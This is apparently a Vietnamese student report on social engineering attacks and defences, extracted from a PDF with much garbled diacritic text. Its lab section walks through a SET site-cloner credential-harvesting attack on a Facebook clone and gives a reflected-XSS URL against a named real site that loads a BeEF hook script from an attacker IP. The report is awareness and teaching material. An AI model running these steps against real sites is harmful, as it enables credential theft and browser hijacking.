NGHIÊN CỨU KỸ THUẬT TẤN CÔNG SOCIAL ENGINEERING

17 310 1
NGHIÊN CỨU KỸ THUẬT TẤN CÔNG SOCIAL ENGINEERING

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

Thông tin tài liệu

Social Engineering thực sự là một kỹ thuật tấn công nguy hiểm. Nguy hiểm vì nó rất khó nhận biết, cách thức tấn công của nó rất đa dạng, từ đơn giản đến phức tạp. Nguy hiểm vì nó có thể được sử dụng từ bất kỳ ai xung quanh chúng ta. Trên thế giới và ở Việt Nam, lĩnh vực nghiên cứu chuyên sâu, cái nhìn về Social Engineering cũng đã tương đối tốt. Tuy nhiên với bộ phận lớp trẻ, kể cả những người học về công nghệ thông tin thì nhận thức về vấn đề này còn rất mơ hồ.

NGHIÊN CỨU KỸ THUẬT TẤN CƠNG SOCIAL ENGINEERING A TĨM TẮT Social Engineering kỹ thuật công không Tuy nhiên, nhiều cá nhân tổ chức chưa có tảng kiến thức kỹ thuật cơng Social Engineering Do đó, tổ chức thường xuyên bị tin tặc cơng trò lừa đảo đơn giản Hacker lợi dụng công vào yếu tố người phá vỡ hệ thống kỹ thuật an ninh Phương pháp sử dụng để thu thập thơng tin trước công Vậy thật ẩn chứa bên Social Engineering gì? B MỞ ĐẦU Trong thời đại nay, với phát triển mạnh mẽ công nghệ thông tin gia tăng nhanh chóng số lượng tội phạm an ninh mạng Vấn đề an tồn thơng tin khơng nỗi lo nước phát triển mà trở thành nỗi lo chung toàn cầu Vào kỷ 21, sức mạnh phần cứng kỹ thuật phần mềm phát triển vượt bậc không đủ khả bảo vệ khỏi việc rò rỉ thông tin Vậy đâu nguyên nhân? Khi thiết bị phương tiện bảo vệ thông tin tin cậy ngày nhiều giới đạo chích, mặt tiếp tục khai thác điểm yếu hệ thống kỹ thuật, mặt khác lại hướng ý vào khâu yếu hệ thống, người, lẽ khơng có phần cứng hay phần mềm khắc phục điểm yếu yếu tố người Chúng sử dụng chiêu lừa đảo khác tận dụng điểm yếu tâm lý tính nhẹ tin, hám lợi người Các chiêu công phi kỹ thuật gọi chung kỹ nghệ xã hội (social engineering) Thực tế cho thấy khả thành công phương thức công cao gấp nhiều lần công trực diện vào hệ thống kỹ thuật Và lý khiến cho kỹ thuật Social Engineering – kỹ thuật công vào yếu tố người ngày trở nên phổ biến tinh vi Trên giới, nói vấn đề bảo mật thông tin người ta khơng nói đến Social Engineering – kỹ thuật khai thác thơng tin nguy hiểm, khó phát hiện, phòng chống gây thiệt hại to lớn cho công tác bảo mật thông tin Ngày nay, công nghệ thông tin đóng vai trò chủ chốt nhiều lĩnh vực quan trọng xã hội như: kinh tế, giáo dục, Nhóm 1- M17CQIS02B trị qn - lĩnh vực mà “lỏng lẻo” công tác bảo mật thông tin khiến phải trả giá đắt Chính Social Engineering nhận quan tâm toàn cầu đặc biệt lĩnh vực công nghệ thông tin C NỘI DUNG Tổng quan Social Engineering 1.1 Khái niệm Trên giới, nói vấn đề bảo mật thơng tin người ta khơng thể khơng nói đến Social Engineering – kỹ thuật khai thác thông tin nguy hiểm, khó phát hiện, phòng chống gây thiệt hại to lớn cho công tác bảo mật thông tin Ngày nay, cơng nghệ thơng tin đóng vai trò chủ chốt nhiều lĩnh vực quan trọng xã hội như: kinh tế, giáo dục, trị quân - lĩnh vực mà “lỏng lẻo” công tác bảo mật thông tin khiến phải trả giá đắt Chính Social Engineering nhận quan tâm toàn cầu đặc biệt lĩnh vực công nghệ thông tin Social Engineering thuật ngữ liên quan đến ngành khoa học xã hội, nhiên thường xuyên sử dụng bắt gặp lĩnh vực cơng nghệ thơng tin Social Engineering hiểu đơn giản kỹ thuật tác động đến người, nhằm mục đích lấy thơng tin đạt mục đích mong muốn Kỹ thuật dựa tảng điểm yếu tâm lý, nhận thức sai lầm người việc bảo mật thông tin, sử dụng ảnh hưởng thuyết phục để đánh lừa người dùng nhằm khai thác thơng tin có lợi cho công thuyết phục nạn nhân thực hành động Với phương pháp này, người cơng tiến hành khai thác thói quen tự nhiên người dùng, tìm lỗ hổng bảo mật hệ thống Social Engineer phương pháp công đơn giản lại vơ hiệu công trực tiếp vào thiếu hiểu biết người dùng.Phương pháp kể từ đời đến phương pháp hiệu khơng có dạng cố định, tùy biến tùy vào kẻ cơng khả phòng thủ vơ khó khăn Nhóm 1- M17CQIS02B 1.2 Ví dụ Một số ví dụ kỹ thuật cơng Social Engineering: Ví dụ 1, tin tặc lợi dụng niềm tin nạn nhân, sau mạo danh người thân gia đình nạn nhân, sau gửi tệp email đính kèm mã độc Lúc này, tin tặc lợi dụng mối quan hệ có sẵn để yêu cầu nạn nhân nhấp vào liên kết, xác minh thông tin Nhưng sau click, thiết bị nạn nhân bị nhiễm mã độc Ví dụ 2, Hacker mạo danh đại diện công ty Coca Cola gửi tin nhắn bạn trúng thưởng X tỷ đồng tin nhắn Facebook Sau bạn click vào đường dẫn, xác minh thông tin cá nhân, bạn trở thành mồi béo bở để Hacker tống tiền rút tiền tài khoản (nếu hacker yêu cầu bạn điền thông tin tài khoản ngân hàng) Tại vụ công liên quan tới Social Engineering nguy hiểm? - Tất người mục tiêu Ngay chuyên gia an ninh mạng trở thành đối tượng cơng Hacker kỹ thuật Social Engineering Đặc biệt kỹ thuật, chiến lược thủ thuật công Social engineering ngày phức tạp - Lợi dụng lòng tin người Những kẻ cơng đóng vai bạn bè, người thân, đối tác bạn Sau chúng lợi dụng lòng tin để tỏ muốn giúp đỡ, tin tưởng, quan tâm tới nạn nhân Đằng sau nghệ thuật lại người nhận bị lừa đảo - Tấn cơng kỹ thuật Social Engineering không thiết phải dùng công cụ Social Engineering dùng thủ thuật, lừa đảo đơn giản sống thường ngày Hacker áp dụng kỹ thuật Social Engineering thực hành vi gian dối khắp nơi, thời điểm Phân loại kỹ thuật công 2.1 Tấn công dựa yếu tố người Kỹ thuật Social Engineering liên quan đến tương tác người với người để thu thông tin mong muốn Ví dụ phải gọi điện thoại đến phòng Help Desk để truy tìm mật Nhóm 1- M17CQIS02B 2.1.1 Direct approach (tiếp cận trực tiếp) Hỏi trực tiếp đối tượng để khai thác thông tin Đây phương pháp đơn giản có kết khơng ngờ số người có thái độ bảo mật thơng tin Cách tiếp cận thơ lỗ rõ ràng, tảng thủ đoạn đánh lừa bí mật Có cách tiếp cận minh chứng thành công Social Engineer: - Sự đe dọa: cách tiếp cận bao gồm mạo danh người có thẩm quyền để ép buộc mục tiêu làm theo yêu cầu - Sự thuyết phục: hình thức thơng thường thuyết phục gồm có nịnh hót hay cách nói quen tồn nhân vật tiếng - Sự mến mộ: cách tiếp cận thủ đoạn dài hơi, người cấp đồng nghiệp xây dựng mối quan hệ để lấy lòng tin, chí, thơng tin từ mục tiêu - Sự trợ giúp: với cách tiếp cận này, hacker tỏ sẵn sàng giúp mục tiêu Sự trợ giúp cuối đòi hỏi mục tiêu tiết lộ thông tin cá nhân giúp hacker đánh cắp nhận dạng mục tiêu 2.1.2 Dumpster Diving and Shoulder Surfing (bới rác nhìn trộm) Đây hai hình thức sử dụng sớm Social Engineering Giấy tờ vứt chứa thơng tin mang lại lợi ích tức thời cho hacker, chẳng hạn user ID số tài khoản bỏ đi, thông tin biểu đồ tổ chức danh sách điện thoại Các loại thông tin vô giá hacker Social Engineering, làm cho ta đáng tin bắt đầu công Phương tiện lưu giữ điện tử chí hữu ích cho hacker Nếu cơng ty, khơng có quy tắc quản lý chất thải bao gồm sử dụng phương tiện thơng tin dư thừa, tìm thấy tất loại thông tin ổ đĩa cứng, CD, DVD khơng sử dụng Shoulder Surfing cách nhìn trộm mật mã PIN Mọi người có chắn đánh mật nơi cơng cộng khơng có nhìn thấy khơng? Nhóm 1- M17CQIS02B 2.1.3 Impersonation and Important User (Giả danh Người dùng quan trọng) Kẻ công giả mạo người quan trọng, chức vụ cao, có uy tín tổ chức Hoặc chúng làm vẻ ngu ngơ, ngốc nghếch tưởng chừng vô hại Từ họ u cầu giúp đỡ, lợi dụng lòng tốt sử dụng danh nghĩa người khác Họ thứ cần thiết để khai thác hệ thống nên lợi dụng người có thơng tin mà không cần phải trải qua xác nhận, kiểm tra 2.1.4 Third-Party Authorization (Quyền bên thứ ba) Lấy danh nghĩa cho phép người để truy cập vào hệ thống Ví dụ: “Ơng A nói đồng ý” “Trước nghỉ mát, giám đốc nói tơi liên lạc với cậu để lấy thơng tin” 2.1.5 Pretexting Với cách này, kẻ công xây dựng kịch chi tiết trước để khai thác nạn nhân: họ làm tăng độ tin tưởng nạn nhân vào mình, từ làm nạn nhân vơ ý có chủ ý tiết lộ thơng tin thực hành động có lợi cho 2.2 Dựa vào yếu tố kỹ thuật Kỹ thuật liên quan đến việc sử dụng phần mềm để cố gắng thu thập thông tin cần thiết 2.2.1 Phishing: Thuật ngữ áp dụng cho email xuất đến từ công ty kinh doanh, ngân hàng thẻ tín dụng u cầu chứng thực thơng tin cảnh báo xảy hậu nghiêm trọng việc không làm Lá thư thường chứa đường link đến trang web giả mạo trông hợp pháp với logo cơng ty nội dung có chứa form để yêu cầu username, password, số thẻ tín dụng số pin 2.2.2 Pop-Up Windows Chúng ta dễ gặp hình thức sử dụng trình duyệt web Popup Windows thường có cửa số xuất hình,người dùng click vào Popup bị chuyển đến trang web tin tặc Sau đó, tin tặc yêu cầu bạn đăng nhập thông tin tải phền mềm chứa mã độc máy Nhóm 1- M17CQIS02B Nội dung Pop- Up thường thơng báo nhận tiền, giải thưởng Đồng thời, chuyển hướng người dùng tới website giả u cầu điền thơng tin kích hoạt Virus, Trojan, Spyware… 2.2.3 Vishing Thuật ngữ kết hợp “voice” phishing Đây dạng phising, kẻ công trực tiếp gọi điện cho nạn nhân thay gởi email Người sử dụng nhận thông điệp tự động với nội dung cảnh báo vấn đề liên quan đến tài khoản ngân hàng Thông điệp hướng dẫn họ gọi đến số điện thoại để khắc phục vấn đề Sau gọi, số điện thoại kết nối người gọi tới hệ thống hỗ trợ giả, yêu cầu họ phải nhập mã thẻ tín dụng Và Voip tiếp tay đắc lực thêm cho dạng công giá rẻ khó giám sát gọi Voip Thư thông báo Virus, Trojan, Worm gây hại cho máy tính 2.2.4 Mail attachments Có hình thức thơng thường sử dụng Đầu tiên mã độc hại Mã ln ln ẩn file đính kèm email Với mục đích user khơng nghi ngờ click hay mở file đó, ví dụ virus IloveYou, sâu Anna Kournikova( trường hợp file đính kèm tên AnnaKournikova.jpg.vbs Nếu tên file bị cắt bớt giống file jpg user không ý phần mở rộng vbs) Thứ hai có hiệu tương tự, bao gồm gởi file đánh lừa hỏi user để xóa file hợp pháp Chúng lập kế hoạch để làm tắc nghẽn hệ thống mail cách báo cáo đe dọa không tồn yêu cầu người nhận chuyển tiếp đến tất bạn đồng nghiệp họ Điều tạo hiệu ứng gọi hiệu ứng cầu tuyết 2.2.5 Interesting Software Trong trường hợp nạn nhân thuyết phục tải cài đặt chương trình hay ứng dụng hữu ích cải thiện hiệu suất CPU, RAM, tiện ích hệ thống crack để sử dụng phần mềm có quyền Và Spyware hay Malware ( chẳng hạn Keylogger) cài đặt thơng qua chương trình độc hại ngụy trang chương trình hợp pháp Nhóm 1- M17CQIS02B Các bước cơng 3.1 Thu thập thơng tin Một chìa khóa thành công Social Engineering thông tin Đáng ngạc nhiên dễ dàng thu thập đầy đủ thông tin tổ chức nhân viên tổ chức Các tổ chức có khuynh hướng đưa q nhiều thơng tin lên website họ phần chiến lược kinh doanh Thông tin thường mô tả hay đưa đầu mối nhà cung cấp ký kết; danh sách điện thoai email; có chi nhánh hay khơng có chúng đâu Tất thơng tin hữu ích với nhà đầu tư tiềm năng, bị sử dụng công Social Engineering Những thứ mà tổ chức ném nguồn tài nguyên thơng tin quan trọng Tìm kiếm thùng rác khám phá hóa đơn, thư từ, sổ tay, giúp cho kẻ công kiếm thông tin quan trọng Mục đích kẻ cơng bước hiểu nhiều thông tin tốt để làm vẻ nhân viên, nhà cung cấp, đối tác chiến lược hợp lệ,… 3.2 Chọn mục tiêu Khi khối lượng thông tin phù hợp tập hợp, kẻ cơng tìm kiếm điểm yếu đáng ý nhân viên tổ chức Mục tiêu thông thường nhân viên hổ trợ kỹ thuật, tập luyện để đưa giúp đỡ thay đổi password, tạo tài khoản, kích hoạt lại tài khoản,… Mục đích hầu hết kẻ cơng tập hợp thông tin nhạy cảm lấy vị trí hệ thống Kẻ cơng nhận chúng truy cập, chí cấp độ khách, chúng nâng quyền lên, bắt đầu công phá hoại che giấu vết Trợ lý administrator mục tiêu Đó cá nhân tiếp cận với liệu nhạy cảm thông thường lưu chuyển thành viên quản trị cấp cao Nhiều trợ lý thực công việc hàng ngày cho quản lý họ mà công việc yêu cầu đặc quyền tài khoản người quản lý 3.3 Tấn công Sự công thực tế thông thường dựa mà gọi “sự lừa gạt” Gồm có loại chính: Nhóm 1- M17CQIS02B 3.3.1 Ego attack Trong loại công này, kẻ công dựa vào vài đặc điểm người Tất thích nói thông minh biết làm hiệu chỉnh công ty Kẻ công sử dụng điều để trích thơng tin từ nạn nhân chúng Kẻ công thường chọn nạn nhân người cảm thấy bị đánh giá không mức làm việc vị trí mà tài họ Kẻ cơng thường phán đốn điều sau nói chuyện ngắn 3.3.2 Sympathy attacks Trong loại công thứ hai này, kẻ công thường giả vờ nhân viên tập sự, nhà thầu, nhân viên nhà cung cấp đối tác chiến lược, người xảy tình khó xử cần giúp đỡ đề thực xong nhiệm vụ Sự quan trọng bước thu thập trở nên rõ ràng đây, kẻ công tạo tin cậy với nạn nhân cách dùng từ chuyên ngành thích hợp thể kiến thức tổ chức Kẻ công giả vờ bận phải hoàn thành vài nhiệm vụ mà yêu cầu truy xuất, nhớ username password,… Một cảm giác khẩn cấp luôn phần kịch Với tính người thông cảm nên hầu hết trường hợp yêu cầu chấp nhận Nếu kẻ công thất bại lấy truy xuất thông tin từ nhân viên, tiếp tục cố gắng tìm thấy người thơng cảm, nhận tổ chức nghi ngờ 3.3.3 Intimidation attacks Với loại thứ ba, kẻ công giả vờ là nhân vật có quyền, người có ảnh hưởng tổ chức Kẻ cơng nhằm vào nạn nhân có vị trí thấp vị trí nhân vật mà giả vờ Kẻ công tạo lý hợp lý cho yêu cầu thiết lập lại password, thay đổi tài khoản, truy xuất đến hệ thống, thông tin nhạy cảm Một số biện pháp phòng chống Mọi người thường mắc phải nhiều điểm yếu vấn đề bảo mật Để phòng chống có hiệu quả, phải dựa vào sách tốt huấn luyện nhân viên thực tốt sách Social Engineering phương pháp khó phòng chống dùng phần cứng hay phần mềm để chống lại Nhóm 1- M17CQIS02B 4.1 Xây dựng sách bảo mật • Chính sách bảo mật tốt biện pháp xử lý nhân viên vi phạm • Tài liệu hướng dẫn cần viết rõ ràng để tất nhân viên dễ dàng hiểu • Có chương trình đào tạo thường xuyên cho cán quản lý toàn thể nhân viên cập nhật kiến thức bảo mật • Sau q trình đào tạo, đánh giá hiệu đào tạo, đồng thời nhân viên nên ký cam kết chịu trách nhiệm bảo đảm thơng tin • Nhân viên làm việc trực tiếp với hệ thống đề cao cảnh giác, đồng thời cập nhật thơng tin thường xun • Mật khẩu: Cần đổi định kỳ, phức tạp, khó đốn biết; Tài khoản bị khóa sau vài lần đăng nhập thất bại; Tuyệt đối không tiết lộ mật hình thức • Bảo đảm an tồn vật lý: Xác nhận nhân viên vào thẻ, đồng phục…; Giám sát khách vào; Khu vực cấm có ranh giới rõ ràng; Tiêu hủy tài liệu khơng sử dụng; Thuê bảo vệ 4.2 Phân loại liệu cá nhân, cơng ty • Phân loại thơng tin: Mật, tuyệt mật, cơng cộng… • Phân quyền truy cập rõ ràng cho đối tượng • Thời gian phục hồi liệu: Tính tốn trước đề phòng Social Engineering xảy • Kiểm tra thật kỹ hồ sơ nhân viên: Dễ quản lý loại bỏ trường hợp nghi ngờ • Không cung cấp thông tin cá nhân qua điện thoại, không hiển thị tài khoản/số điện thoại không cần thiết 4.3 Nâng cao nhận thức bảo mật cho nhân viên Có thể thấy, nguy hiểm kỹ thuật cơng quy trình thẩm định thông tin cá nhân Thông qua tường lửa, mạng riêng ảo, phần mềm giám sát mạng… giúp mở rộng cơng, kỹ thuật cơng khơng sử dụng biện pháp trực tiếp Nhóm 1- M17CQIS02B Thay vào yếu tố người quan trọng Chính lơ nhân viên công ty kẽ công thu thập thơng tin quan trọng Do đó, để phòng chống kiểu cơng cách hiệu nhất, người cần nâng cao nhận thức trang bị kiến thức cho Nhân viên phải hiểu đầy đủ tác động việc ném giấy thải phương tiện lưu trữ điện tử vào thùng rác Sau di chuyển rác thải ngồi cơng ty, tính sở hữu trở thành không rõ ràng pháp luật Dumpster diving khơng coi bất hợp pháp hồn cảnh, phải đưa lời khuyên xử lý rác thải Luôn cắt thành miếng nhỏ giấy vụn xóa phá hủy phương tiện có từ tính Nếu có loại chất thải lớn khó để đặt vào máy hủy, chẳng hạn niên giám điện thoại, có kỹ thuật vượt khả user để hủy nó, phải phát triển giao thức cho việc vứt bỏ Một biện pháp có hiệu để quản lý giấy thải đặc tả việc phân loại liệu Bạn xác định loại giấy khác dựa thông tin định cách thức nhân viên quản lý vứt bỏ họ Ví dụ phân thành loại: Bí mật cơng ty, riêng tư, văn phòng, cơng cộng Cài đặt Kali Linux thử nghiệm kỹ thuật cơng Social Engineering Trong báo cáo này, nhóm em sử dụng hệ điều hành KaLi linux phiên 2017.1 cài VMware Workstration 12 Pro 5.1 Hệ điều hành KaLi Linux 5.1.1 Sơ lược hệ điều hành KaLi Linux Kali Linux phát hành vào ngày 13 tháng năm 2013 với tư cách dựng lại hoàn chỉnh từ đầu BackTrack Linux, tơn trọng hồn tồn tiêu chuẩn phát triển Debian Kali Linux Debian hệ điều hành mã nguồn mở Linux Kali Linux thiết kế tùy biến chuyên gia bảo mật Theo đó, tích hợp sẵn loạt cơng cụ dùng cho việc thâm nhập, hacking, phân tích,… tất điều phân loại rõ ràng Do đó, nói “Kali Linux OS hữu ích chuyên gia đánh giá bảo mật, OS tập hợp phân loại gần tất cơng cụ thiết yếu mà Nhóm 1- M17CQIS02B 10 chuyên gia đánh giá bảo mật cần sử dụng đến tác nghiệp”, theo DNA Core Security Kali chứa hàng trăm công cụ hướng tới nhiệm vụ bảo mật thông tin khác nhau, chẳng hạn Penetration Testing, Security research, Computer Forensics Reverse Engineering Kali Linux phát triển, tài trợ trì Offensive Security, cơng ty đào tạo an ninh thông tin hàng đầu 5.1.2 Cài đặt hệ điều hành mã nguồn mở KaLi Linux Bước 1: Tải Kali Linux 2017.1 Giống phân phối khác Linux, Kali Linux 2017.1 phát hành hồn tồn miễn phí https://www.kali.org/downloads/ Bước 2: Cài đặt KaLi Linux 2017.1 Sau đó, tiến hành cài đặt hệ điều hành KaLi Linux giống hệ điều hành mã nguồn mở khác cài VMware ta kết đây: Hình 5.1: Giao diện hệ điều hành mã nguồn mở KaLi Linux 2017.1 5.2 Thử nghiệm kỹ thuật công Socail Engineering 5.2.1 Tấn công phương pháp công Phishing Đầu tiên, mở Temail gõ lệnh: setoolkit ấn Enter Nhóm 1- M17CQIS02B 11 Hình 5.2: Chạy setoolkit thành cơng Khi bảng menu trên, chọn ấn Enter để thực kỹ thuật công Social – Engineering Attacks Hình 5.3: Menu chọn kỹ thuật cơng Tạo web phishing: Tiếp tục ta chọn ấn enter Sau lại hiển thị menu chọn ta chọn Credential Harvester Attack Method Phương pháp Credential Harvester Attack tạo trang web (Web giả mạo), sau lưu trữ lại thứ nhập vào Nhóm 1- M17CQIS02B 12 Ngồi ta có số phương pháp khác như: Java Applet Attack Method tạo ứng dụng Java có chứa kèm shell cho phép ta xâm nhập Metasploit Browser Exploit công mục hệ thống mục tiêu qua khai thác từ Metasploit TabNabbing Attack thời gian, sau tự động chuyển sang tab mà SET tạo Phương pháp Web Jacking sử dụng iFrame để tạo liên kết độc hại trơng an toàn Cuối Multi-Attack Web Method tổng hợp số phương thức Hình 5.4: Lựa chọn phương pháp công Tiếp tục ta chọn 2: Site Cloner ấn Enter chọn y Sau cần nhập vào: IP address for the POST back in Harvester/Tabnabbing: 192.168.0.106 (Nhập vào địa IP máy chạy Kali Linux) Enter the url to clone: Nhập vào địa trang web muốn chép VD: https://facebook.com Nhóm 1- M17CQIS02B 13 Hình 5.5: Phương pháp Credential Harvester Attack Sau cần dụ nạn nhân ấn vào đường link web giả mạo để lấy thơng tin nạn nhân Hình 5.6: Giao diện Web giả mạo Nhóm 1- M17CQIS02B 14 Hình 5.7: Thơng tin trả Cuối kết sau: Hình 5.8: Thông tin nạn nhân 5.2.2 Tấn công XSS – Tấn công sử dụng khung Beef XSS Bước 1: Cài đặt Beef XSS Kali Linux (nếu hệ điều hành chưa có), sau mở Beef lên cửa sổ xuất cho biết tên người dùng mật để đăng nhập vào hệ quản trị viên Beef Theo mặc định tên người dùng: beef password: beef Đường dẫn link vào hệ quản trị Beef có dạng sau: http: // your_ip_or_hostname: 3000 / ui / bảng điều khiển Nhóm 1- M17CQIS02B 15 Hình 5.9 : Giao diện đăng nhập vào hệ thống Beef Hình 5.10: Giao diện Beef đăng nhập thành công Bước 2: Từ thông tin thu phát có lỗ hổng XSS, ta cài đoạn mã code vào tìm kiếm Bước 3: Người công bước chép URL với tập lệnh độc hại bên gửi cho nạn nhân Đây URL cài lệnh độc hại: http://niem.edu.vn/tabid/474/action/search/language/viVN/Default.aspx?terms=%3Cscript%20src=http://192.168.0.101:3000/hook.js%3E%3C% 2fscript%3E Nhóm 1- M17CQIS02B 16 Bước 4: Khi nạn nhân nhấp vào liên kết gửi người công, cửa sổ dòng lệnh cơng hiển thị hoạt động.Khi di chuyển đến quản trị xss Beef, ghi lại số hoạt động Hình 5.11: Nạn nhân 192.168.0.109 dính mã độc D KẾT LUẬN Social Engineering thực kỹ thuật cơng nguy hiểm Nguy hiểm khó nhận biết, cách thức cơng đa dạng, từ đơn giản đến phức tạp Nguy hiểm sử dụng từ xung quanh Trên giới Việt Nam, lĩnh vực nghiên cứu chuyên sâu, nhìn Social Engineering tương đối tốt Tuy nhiên với phận lớp trẻ, kể người học cơng nghệ thơng tin nhận thức vấn đề mơ hồ Qua tiểu luận, chúng em muốn mô tả cách dễ hiểu Social Engineering Từ đây, mong muốn người nâng cao nhận thức vấn đề bảo mật thơng tin cá nhân nói riêng trang bị kiến thức để phòng tránh Social Engineering nói chung Mục tiêu tiểu luận đưa hệ thống cách phòng tránh ảnh hưởng Social Engineering cá nhân Từ giúp cho việc bảo vệ an ninh tố chức nâng cao Nhóm 1- M17CQIS02B 17

Ngày đăng: 06/12/2019, 13:47

Từ khóa liên quan

Tài liệu cùng người dùng

  • Đang cập nhật ...

Tài liệu liên quan